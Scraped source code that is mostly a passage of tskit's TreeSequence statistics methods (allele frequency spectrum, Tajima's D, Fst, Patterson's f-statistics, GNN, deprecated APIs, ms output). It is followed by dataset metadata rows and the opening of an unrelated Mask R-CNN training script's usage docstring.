if np.linalg.matrix_rank(tZ) == tZ.shape[1]:
Z = tZ
if Z.shape[0] != self.num_samples:
raise ValueError("First dimension of Z must equal the number of samples.")
if np.linalg.matrix_rank(Z) < Z.shape[1]:
raise ValueError("Matrix of covariates is computationally singular.")
# numpy returns a lower-triangular cholesky
K = np.linalg.cholesky(np.matmul(Z.T, Z)).T
Z = np.matmul(Z, np.linalg.inv(K))
return self.__run_windowed_stat(
windows,
self._ll_tree_sequence.trait_linear_model,
W,
Z,
mode=mode,
span_normalise=span_normalise,
)
def segregating_sites(
self, sample_sets=None, windows=None, mode="site", span_normalise=True
):
"""
Computes the density of segregating sites for each of the sets of nodes
from ``sample_sets``, and related quantities.
Please see the :ref:`one-way statistics <sec_stats_sample_sets_one_way>`
section for details on how the ``sample_sets`` argument is interpreted
and how it interacts with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`, :ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``. For a sample set ``A``, computes:
"site"
The sum over sites of the number of alleles found in ``A`` at each site
minus one, per unit of chromosome length.
If all sites have at most two alleles, this is the density of sites
that are polymorphic in ``A``. To get the **number** of segregating minor
alleles per window, pass ``span_normalise=False``.
"branch"
The total length of all branches in the tree subtended by the samples in
``A``, averaged across the window.
"node"
The proportion of the window on which the node is ancestral to some,
but not all, of the samples in ``A``.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__one_way_sample_set_stat(
self._ll_tree_sequence.segregating_sites,
sample_sets,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def allele_frequency_spectrum(
self,
sample_sets=None,
windows=None,
mode="site",
span_normalise=True,
polarised=False,
):
"""
Computes the allele frequency spectrum (AFS) in windows across the genome for
with respect to the specified ``sample_sets``.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`sample sets <sec_stats_sample_sets>`,
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
:ref:`polarised <sec_stats_polarisation>`,
and :ref:`return value <sec_stats_output_format>`.
and see :ref:`sec_tutorial_afs` for examples of how to use this method.
Similar to other windowed stats, the first dimension in the returned array
corresponds to windows, such that ``result[i]`` is the AFS in the ith
window. The AFS in each window is a k-dimensional numpy array, where k is
the number of input sample sets, such that ``result[i, j0, j1, ...]`` is the
value associated with frequency ``j0`` in ``sample_sets[0]``, ``j1`` in
``sample_sets[1]``, etc, in window ``i``. From here, we will assume that
``afs`` corresponds to the result in a single window, i.e.,
``afs = result[i]``.
If a single sample set is specified, the allele frequency spectrum within
this set is returned, such that ``afs[j]`` is the value associated with
frequency ``j``. Thus, singletons are counted in ``afs[1]``, doubletons in
``afs[2]``, and so on. The zeroth entry counts alleles or branches not
seen in the samples but that are polymorphic among the rest of the samples
of the tree sequence; likewise, the last entry counts alleles fixed in
the sample set but polymorphic in the entire set of samples. Please see
the :ref:`sec_tutorial_afs_zeroth_entry` for an illustration.
.. warning:: Please note that singletons are **not** counted in the initial
entry in each AFS array (i.e., ``afs[0]``), but in ``afs[1]``.
If ``sample_sets`` is None (the default), the allele frequency spectrum
for all samples in the tree sequence is returned.
If more than one sample set is specified, the **joint** allele frequency
spectrum within windows is returned. For example, if we set
``sample_sets = [S0, S1]``, then afs[1, 2] counts the number of sites that
are singletons within S0 and doubletons in S1. The dimensions of the
output array will be ``[num_windows] + [1 + len(S) for S in sample_sets]``.
If ``polarised`` is False (the default) the AFS will be *folded*, so that
the counts do not depend on knowing which allele is ancestral. If folded,
the frequency spectrum for a single sample set ``S`` has ``afs[j] = 0`` for
all ``j > len(S) / 2``, so that alleles at frequency ``j`` and ``len(S) - j``
both add to the same entry. If there is more than one sample set, the
returned array is "lower triangular" in a similar way. For more details,
especially about handling of multiallelic sites, see :ref:`sec_stats_afs`.
What is computed depends on ``mode``:
"site"
The number of alleles at a given frequency within the specified sample
sets for each window, per unit of sequence length. To obtain the total
number of alleles, set ``span_normalise`` to False.
"branch"
The total length of branches in the trees subtended by subsets of the
specified sample sets, per unit of sequence length. To obtain the
total, set ``span_normalise`` to False.
"node"
Not supported for this method (raises a ValueError).
For example, suppose that `S0` is a list of 5 sample IDs, and `S1` is
a list of 3 other sample IDs. Then `afs = ts.allele_frequency_spectrum([S0, S1],
mode="site", span_normalise=False)` will be a 5x3 numpy array, and if
there are six alleles that are present in only one sample of `S0` but
two samples of `S1`, then `afs[1,2]` will be equal to 6. Similarly,
`branch_afs = ts.allele_frequency_spectrum([S0, S1], mode="branch",
span_normalise=False)` will also be a 5x3 array, and `branch_afs[1,2]`
will be the total area (i.e., length times span) of all branches that
are above exactly one sample of `S0` and two samples of `S1`.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of samples to compute the joint allele frequency
:param list windows: An increasing list of breakpoints between windows
along the genome.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A (k + 1) dimensional numpy array, where k is the number of sample
sets specified.
"""
# TODO should we allow a single sample_set to be specified here as a 1D array?
# This won't change the output dimensions like the other stats.
if sample_sets is None:
sample_sets = [self.samples()]
return self.__one_way_sample_set_stat(
self._ll_tree_sequence.allele_frequency_spectrum,
sample_sets,
windows=windows,
mode=mode,
span_normalise=span_normalise,
polarised=polarised,
)
def Tajimas_D(self, sample_sets=None, windows=None, mode="site"):
"""
Computes Tajima's D of sets of nodes from ``sample_sets`` in windows.
Please see the :ref:`one-way statistics <sec_stats_sample_sets_one_way>`
section for details on how the ``sample_sets`` argument is interpreted
and how it interacts with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`, :ref:`mode <sec_stats_mode>`,
and :ref:`return value <sec_stats_output_format>`.
Operates on ``k = 1`` sample sets at a
time. For a sample set ``X`` of ``n`` nodes, if and ``T`` is the mean
number of pairwise differing sites in ``X`` and ``S`` is the number of
sites segregating in ``X`` (computed with :meth:`diversity
<.TreeSequence.diversity>` and :meth:`segregating sites
<.TreeSequence.segregating_sites>`, respectively, both not span
normalised), then Tajima's D is
.. code-block:: python
D = (T - S / h) / sqrt(a * S + (b / c) * S * (S - 1))
h = 1 + 1 / 2 + ... + 1 / (n - 1)
g = 1 + 1 / 2 ** 2 + ... + 1 / (n - 1) ** 2
a = (n + 1) / (3 * (n - 1) * h) - 1 / h ** 2
b = 2 * (n ** 2 + n + 3) / (9 * n * (n - 1)) - (n + 2) / (h * n) + g / h ** 2
c = h ** 2 + g
What is computed for diversity and divergence depends on ``mode``;
see those functions for more details.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 2-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:return: A ndarray with shape equal to (num windows, num statistics).
"""
# TODO this should be done in C as we'll want to support this method there.
def tjd_func(sample_set_sizes, flattened, **kwargs):
n = sample_set_sizes
T = self.ll_tree_sequence.diversity(n, flattened, **kwargs)
S = self.ll_tree_sequence.segregating_sites(n, flattened, **kwargs)
h = np.array([np.sum(1 / np.arange(1, nn)) for nn in n])
g = np.array([np.sum(1 / np.arange(1, nn) ** 2) for nn in n])
with np.errstate(invalid="ignore", divide="ignore"):
a = (n + 1) / (3 * (n - 1) * h) - 1 / h ** 2
b = (
2 * (n ** 2 + n + 3) / (9 * n * (n - 1))
- (n + 2) / (h * n)
+ g / h ** 2
)
D = (T - S / h) / np.sqrt(a * S + (b / (h ** 2 + g)) * S * (S - 1))
return D
return self.__one_way_sample_set_stat(
tjd_func, sample_sets, windows=windows, mode=mode, span_normalise=False
)
def Fst(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes "windowed" Fst between pairs of sets of nodes from ``sample_sets``.
Operates on ``k = 2`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
For sample sets ``X`` and ``Y``, if ``d(X, Y)`` is the
:meth:`divergence <.TreeSequence.divergence>`
between ``X`` and ``Y``, and ``d(X)`` is the
:meth:`diversity <.TreeSequence.diversity>` of ``X``, then what is
computed is
.. code-block:: python
Fst = 1 - 2 * (d(X) + d(Y)) / (d(X) + 2 * d(X, Y) + d(Y))
What is computed for diversity and divergence depends on ``mode``;
see those functions for more details.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 2-tuples.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
# TODO this should really be implemented in C (presumably C programmers will want
# to compute Fst too), but in the mean time implementing using the low-level
# calls has two advantages: (a) we automatically change dimensions like the other
# two-way stats and (b) it's a bit more efficient because we're not messing
# around with indexes and samples sets twice.
def fst_func(sample_set_sizes, flattened, indexes, **kwargs):
diversities = self._ll_tree_sequence.diversity(
sample_set_sizes, flattened, **kwargs
)
divergences = self._ll_tree_sequence.divergence(
sample_set_sizes, flattened, indexes, **kwargs
)
orig_shape = divergences.shape
# "node" statistics produce a 3D array
if len(divergences.shape) == 2:
divergences.shape = (divergences.shape[0], 1, divergences.shape[1])
diversities.shape = (diversities.shape[0], 1, diversities.shape[1])
fst = np.repeat(1.0, np.product(divergences.shape))
fst.shape = divergences.shape
for i, (u, v) in enumerate(indexes):
denom = (
diversities[:, :, u]
+ diversities[:, :, v]
+ 2 * divergences[:, :, i]
)
with np.errstate(divide="ignore", invalid="ignore"):
fst[:, :, i] -= (
2 * (diversities[:, :, u] + diversities[:, :, v]) / denom
)
fst.shape = orig_shape
return fst
return self.__k_way_sample_set_stat(
fst_func,
2,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def Y3(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes the 'Y' statistic between triples of sets of nodes from ``sample_sets``.
Operates on ``k = 3`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``. Each is an average across
randomly chosen trios of samples ``(a, b, c)``, one from each sample set:
"site"
The average density of sites at which ``a`` differs from ``b`` and
``c``, per unit of chromosome length.
"branch"
The average length of all branches that separate ``a`` from ``b``
and ``c`` (in units of time).
"node"
For each node, the average proportion of the window on which ``a``
inherits from that node but ``b`` and ``c`` do not, or vice-versa.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 3-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__k_way_sample_set_stat(
self._ll_tree_sequence.Y3,
3,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def Y2(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes the 'Y2' statistic between pairs of sets of nodes from ``sample_sets``.
Operates on ``k = 2`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``. Each is computed exactly as
``Y3``, except that the average across randomly chosen trios of samples
``(a, b1, b2)``, where ``a`` is chosen from the first sample set, and
``b1, b2`` are chosen (without replacement) from the second sample set.
See :meth:`Y3 <.TreeSequence.Y3>` for more details.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 2-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__k_way_sample_set_stat(
self._ll_tree_sequence.Y2,
2,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def Y1(self, sample_sets, windows=None, mode="site", span_normalise=True):
"""
Computes the 'Y1' statistic within each of the sets of nodes given by
``sample_sets``.
Please see the :ref:`one-way statistics <sec_stats_sample_sets_one_way>`
section for details on how the ``sample_sets`` argument is interpreted
and how it interacts with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`, :ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
Operates on ``k = 1`` sample set at a time.
What is computed depends on ``mode``. Each is computed exactly as
``Y3``, except that the average is across a randomly chosen trio of
samples ``(a1, a2, a3)`` all chosen without replacement from the same
sample set. See :meth:`Y3 <.TreeSequence.Y3>` for more details.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__one_way_sample_set_stat(
self._ll_tree_sequence.Y1,
sample_sets,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def f4(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes Patterson's f4 statistic between four groups of nodes from
``sample_sets``.
Operates on ``k = 4`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``. Each is an average across
randomly chosen set of four samples ``(a, b; c, d)``, one from each sample set:
"site"
The average density of sites at which ``a`` and ``c`` agree but
differs from ``b`` and ``d``, minus the average density of sites at
which ``a`` and ``d`` agree but differs from ``b`` and ``c``, per
unit of chromosome length.
"branch"
The average length of all branches that separate ``a`` and ``c``
from ``b`` and ``d``, minus the average length of all branches that
separate ``a`` and ``d`` from ``b`` and ``c`` (in units of time).
"node"
For each node, the average proportion of the window on which ``a`` and ``c``
inherit from that node but ``b`` and ``d`` do not, or vice-versa,
minus the average proportion of the window on which ``a`` anc ``d``
inherit from that node but ``b`` and ``c`` do not, or vice-versa.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 4-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__k_way_sample_set_stat(
self._ll_tree_sequence.f4,
4,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def f3(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes Patterson's f3 statistic between three groups of nodes from
``sample_sets``.
Operates on ``k = 3`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``. Each works exactly as
:meth:`f4 <.TreeSequence.f4>`, except the average is across randomly
chosen set of four samples ``(a1, b; a2, c)``, with `a1` and `a2` both
chosen (without replacement) from the first sample set. See
:meth:`f4 <.TreeSequence.f4>` for more details.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 3-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__k_way_sample_set_stat(
self._ll_tree_sequence.f3,
3,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def f2(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes Patterson's f3 statistic between two groups of nodes from
``sample_sets``.
Operates on ``k = 2`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``. Each works exactly as
:meth:`f4 <.TreeSequence.f4>`, except the average is across randomly
chosen set of four samples ``(a1, b1; a2, b2)``, with `a1` and `a2`
both chosen (without replacement) from the first sample set and ``b1``
and ``b2`` chosen randomly without replacement from the second sample
set. See :meth:`f4 <.TreeSequence.f4>` for more details.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 2-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__k_way_sample_set_stat(
self._ll_tree_sequence.f2,
2,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def mean_descendants(self, sample_sets):
"""
Computes for every node the mean number of samples in each of the
`sample_sets` that descend from that node, averaged over the
portions of the genome for which the node is ancestral to *any* sample.
The output is an array, `C[node, j]`, which reports the total span of
all genomes in `sample_sets[j]` that inherit from `node`, divided by
the total span of the genome on which `node` is an ancestor to any
sample in the tree sequence.
.. warning:: The interface for this method is preliminary and may be subject to
backwards incompatible changes in the near future. The long-term stable
API for this method will be consistent with other :ref:`sec_stats`.
In particular, the normalization by proportion of the genome that `node`
is an ancestor to anyone may not be the default behaviour in the future.
:param list sample_sets: A list of lists of node IDs.
:return: An array with dimensions (number of nodes in the tree sequence,
number of reference sets)
"""
return self._ll_tree_sequence.mean_descendants(sample_sets)
def genealogical_nearest_neighbours(self, focal, sample_sets, num_threads=0):
"""
Return the genealogical nearest neighbours (GNN) proportions for the given
focal nodes, with reference to two or more sets of interest, averaged over all
trees in the tree sequence.
The GNN proportions for a focal node in a single tree are given by first finding
the most recent common ancestral node :math:`a` between the focal node and any
other node present in the reference sets. The GNN proportion for a specific
reference set, :math:`S` is the number of nodes in :math:`S` that descend from
:math:`a`, as a proportion of the total number of descendant nodes in any of the
reference sets.
For example, consider a case with 2 sample sets, :math:`S_1` and :math:`S_2`.
For a given tree, :math:`a` is the node that includes at least one descendant in
:math:`S_1` or :math:`S_2` (not including the focal node). If the descendants of
:math:`a` include some nodes in :math:`S_1` but no nodes in :math:`S_2`, then the
GNN proportions for that tree will be 100% :math:`S_1` and 0% :math:`S_2`, or
:math:`[1.0, 0.0]`.
For a given focal node, the GNN proportions returned by this function are an
average of the GNNs for each tree, weighted by the genomic distance spanned by
that tree.
For an precise mathematical definition of GNN, see https://doi.org/10.1101/458067
.. note:: The reference sets need not include all the samples, hence the most
recent common ancestral node of the reference sets, :math:`a`, need not be
the immediate ancestor of the focal node. If the reference sets only comprise
sequences from relatively distant individuals, the GNN statistic may end up
as a measure of comparatively distant ancestry, even for tree sequences that
contain many closely related individuals.
.. warning:: The interface for this method is preliminary and may be subject to
backwards incompatible changes in the near future. The long-term stable
API for this method will be consistent with other :ref:`sec_stats`.
:param list focal: A list of :math:`n` nodes whose GNNs should be calculated.
:param list sample_sets: A list of :math:`m` lists of node IDs.
:return: An :math:`n` by :math:`m` array of focal nodes by GNN proportions.
Every focal node corresponds to a row. The numbers in each
row corresponding to the GNN proportion for each of the passed-in reference
sets. Rows therefore sum to one.
:rtype: numpy.ndarray
"""
# TODO add windows=None option: https://github.com/tskit-dev/tskit/issues/193
if num_threads <= 0:
return self._ll_tree_sequence.genealogical_nearest_neighbours(
focal, sample_sets
)
else:
worker = functools.partial(
self._ll_tree_sequence.genealogical_nearest_neighbours,
reference_sets=sample_sets,
)
focal = util.safe_np_int_cast(focal, np.int32)
splits = np.array_split(focal, num_threads)
with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as pool:
arrays = pool.map(worker, splits)
return np.vstack(list(arrays))
def kc_distance(self, other, lambda_=0.0):
"""
Returns the average :meth:`Tree.kc_distance` between pairs of trees along
the sequence whose intervals overlap. The average is weighted by the
fraction of the sequence on which each pair of trees overlap.
:param TreeSequence other: The other tree sequence to compare to.
:param float lambda_: The KC metric lambda parameter determining the
relative weight of topology and branch length.
:return: The computed KC distance between this tree sequence and other.
:rtype: float
"""
return self._ll_tree_sequence.get_kc_distance(other._ll_tree_sequence, lambda_)
def count_topologies(self, sample_sets=None):
"""
Returns a generator that produces the same distribution of topologies as
:meth:`Tree.count_topologies` but sequentially for every tree in a tree
sequence. For use on a tree sequence this method is much faster than
computing the result independently per tree.
.. warning:: The interface for this method is preliminary and may be subject to
backwards incompatible changes in the near future.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:rtype: iter(:class:`tskit.TopologyCounter`)
:raises ValueError: If nodes in ``sample_sets`` are invalid or are
internal samples.
"""
if sample_sets is None:
sample_sets = [
self.samples(population=pop.id) for pop in self.populations()
]
yield from combinatorics.treeseq_count_topologies(self, sample_sets)
############################################
#
# Deprecated APIs. These are either already unsupported, or will be unsupported in a
# later release.
#
############################################
def get_pairwise_diversity(self, samples=None):
# Deprecated alias for self.pairwise_diversity
return self.pairwise_diversity(samples)
def pairwise_diversity(self, samples=None):
"""
Returns the pairwise nucleotide site diversity, the average number of sites
that differ between a randomly chosen pair of samples. If `samples` is
specified, calculate the diversity within this set.
.. deprecated:: 0.2.0
please use :meth:`.diversity` instead. Since version 0.2.0 the error
semantics have also changed slightly. It is no longer an error
when there is one sample and a tskit.LibraryError is raised
when non-sample IDs are provided rather than a ValueError. It is
also no longer an error to compute pairwise diversity at sites
with multiple mutations.
:param list samples: The set of samples within which we calculate
the diversity. If None, calculate diversity within the entire sample.
:return: The pairwise nucleotide site diversity.
:rtype: float
"""
if samples is None:
samples = self.samples()
return float(
self.diversity(
[samples], windows=[0, self.sequence_length], span_normalise=False
)[0]
)
def get_time(self, u):
# Deprecated. Use ts.node(u).time
if u < 0 or u >= self.get_num_nodes():
raise ValueError("ID out of bounds")
node = self.node(u)
return node.time
def get_population(self, u):
# Deprecated. Use ts.node(u).population
if u < 0 or u >= self.get_num_nodes():
raise ValueError("ID out of bounds")
node = self.node(u)
return node.population
def records(self):
# Deprecated. Use either ts.edges() or ts.edgesets().
t = [node.time for node in self.nodes()]
pop = [node.population for node in self.nodes()]
for e in self.edgesets():
yield CoalescenceRecord(
e.left, e.right, e.parent, e.children, t[e.parent], pop[e.parent]
)
# Unsupported old methods.
def get_num_records(self):
raise NotImplementedError(
"This method is no longer supported. Please use the "
"TreeSequence.num_edges if possible to work with edges rather "
"than coalescence records. If not, please use len(list(ts.edgesets())) "
"which should return the number of coalescence records, as previously "
"defined. Please open an issue on GitHub if this is "
"important for your workflow."
)
def diffs(self):
raise NotImplementedError(
"This method is no longer supported. Please use the "
"TreeSequence.edge_diffs() method instead"
)
def newick_trees(self, precision=3, breakpoints=None, Ne=1):
raise NotImplementedError(
"This method is no longer supported. Please use the Tree.newick"
" method instead"
)
def write_ms(
tree_sequence,
output,
print_trees=False,
precision=4,
num_replicates=1,
write_header=True,
):
"""
Write ``ms`` formatted output from the genotypes of a tree sequence
or an iterator over tree sequences. Usage:
.. code-block:: python
import tskit as ts
tree_sequence = msprime.simulate(
sample_size=sample_size,
Ne=Ne,
length=length,
mutation_rate=mutation_rate,
recombination_rate=recombination_rate,
random_seed=random_seed,
num_replicates=num_replicates,
)
with open("output.ms", "w") as ms_file:
ts.write_ms(tree_sequence, ms_file)
:param ts tree_sequence: The tree sequence (or iterator over tree sequences) to
write to ms file
:param io.IOBase output: The file-like object to write the ms-style output
:param bool print_trees: Boolean parameter to write out newick format trees
to output [optional]
:param int precision: Numerical precision with which to write the ms
output [optional]
:param bool write_header: Boolean parameter to write out the header. [optional]
:param int num_replicates: Number of replicates simulated [required if
num_replicates used in simulation]
The first line of this ms-style output file written has two arguments which
are sample size and number of replicates. The second line has a 0 as a substitute
for the random seed.
"""
if not isinstance(tree_sequence, collections.abc.Iterable):
tree_sequence = [tree_sequence]
i = 0
for tree_seq in tree_sequence:
if i > 0:
write_header = False
i = i + 1
if write_header is True:
print(
f"ms {tree_seq.sample_size} {num_replicates}",
file=output,
)
print("0", file=output)
print(file=output)
print("//", file=output)
if print_trees is True:
"""
Print out the trees in ms-format from the specified tree sequence.
"""
if len(tree_seq.trees()) == 1:
tree = next(tree_seq.trees())
newick = tree.newick(precision=precision)
print(newick, file=output)
else:
for tree in tree_seq.trees():
newick = tree.newick(precision=precision)
print(f"[{tree.span:.{precision}f}]", newick, file=output)
else:
s = tree_seq.get_num_sites()
print("segsites:", s, file=output)
if s != 0:
print("positions: ", end="", file=output)
positions = [
variant.position / (tree_seq.sequence_length)
for variant in tree_seq.variants()
]
for position in positions:
print(
f"{position:.{precision}f}",
end=" ",
file=output,
)
print(file=output)
genotypes = tree_seq.genotype_matrix()
for k in range(tree_seq.num_samples):
tmp_str = "".join(map(str, genotypes[:, k]))
if set(tmp_str).issubset({"0", "1", "-"}):
print(tmp_str, file=output)
else:
raise ValueError(
"This tree sequence contains non-biallelic"
"SNPs and is incompatible with the ms format!"
)
else:
print(file=output)
| 43.087498 | 93 | 0.622987 |
0e8bc232328a495f44230c1b42b591a37ece2c7a | 54 | py | Python | openpathsampling/pathmovers/move_schemes.py | bolhuis/openpathsampling | 4a12af0ee1143cdbc272b10a8c7cbea735566ce1 | [
"MIT"
] | 64 | 2016-07-06T13:38:51.000Z | 2022-03-30T15:58:01.000Z | openpathsampling/pathmovers/move_schemes.py | bolhuis/openpathsampling | 4a12af0ee1143cdbc272b10a8c7cbea735566ce1 | [
"MIT"
] | 601 | 2016-06-13T10:22:01.000Z | 2022-03-25T00:10:40.000Z | openpathsampling/pathmovers/move_schemes.py | hejung/openpathsampling | e8b091c92916561954542d40d17d7241b203d1ad | [
"MIT"
] | 45 | 2016-11-10T11:17:53.000Z | 2022-02-13T11:50:26.000Z | from .spring_shooting import SpringShootingMoveScheme
| 27 | 53 | 0.907407 |
c70bf818563fc3b0721b90235086541a8e4a140f | 13,955 | py | Python | mrcnn/custom.py | SmritiBahuguna/MaskRCNN_SolarPanel | 35525bbc493842b110b47b49b04e1ffc2d82df43 | [
"Apache-2.0"
] | null | null | null | mrcnn/custom.py | SmritiBahuguna/MaskRCNN_SolarPanel | 35525bbc493842b110b47b49b04e1ffc2d82df43 | [
"Apache-2.0"
] | null | null | null | mrcnn/custom.py | SmritiBahuguna/MaskRCNN_SolarPanel | 35525bbc493842b110b47b49b04e1ffc2d82df43 | [
"Apache-2.0"
] | null | null | null | """
Mask R-CNN
Train on the toy Balloon dataset and implement color splash effect.
Copyright (c) 2018 Matterport, Inc.
Licensed under the MIT License (see LICENSE for details)
Written by Waleed Abdulla
------------------------------------------------------------
Usage: import the module (see Jupyter notebooks for examples), or run from
the command line as such:
# Train a new model starting from pre-trained COCO weights
python3 balloon.py train --dataset=/path/to/balloon/dataset --weights=coco
# Resume training a model that you had trained earlier
python3 balloon.py train --dataset=/path/to/balloon/dataset --weights=last
# Train a new model starting from ImageNet weights
python3 balloon.py train --dataset=/path/to/balloon/dataset --weights=imagenet
# Apply color splash to an image
python3 balloon.py splash --weights=/path/to/weights/file.h5 --image=<URL or path to file>
# Apply color splash to video using the last weights you trained
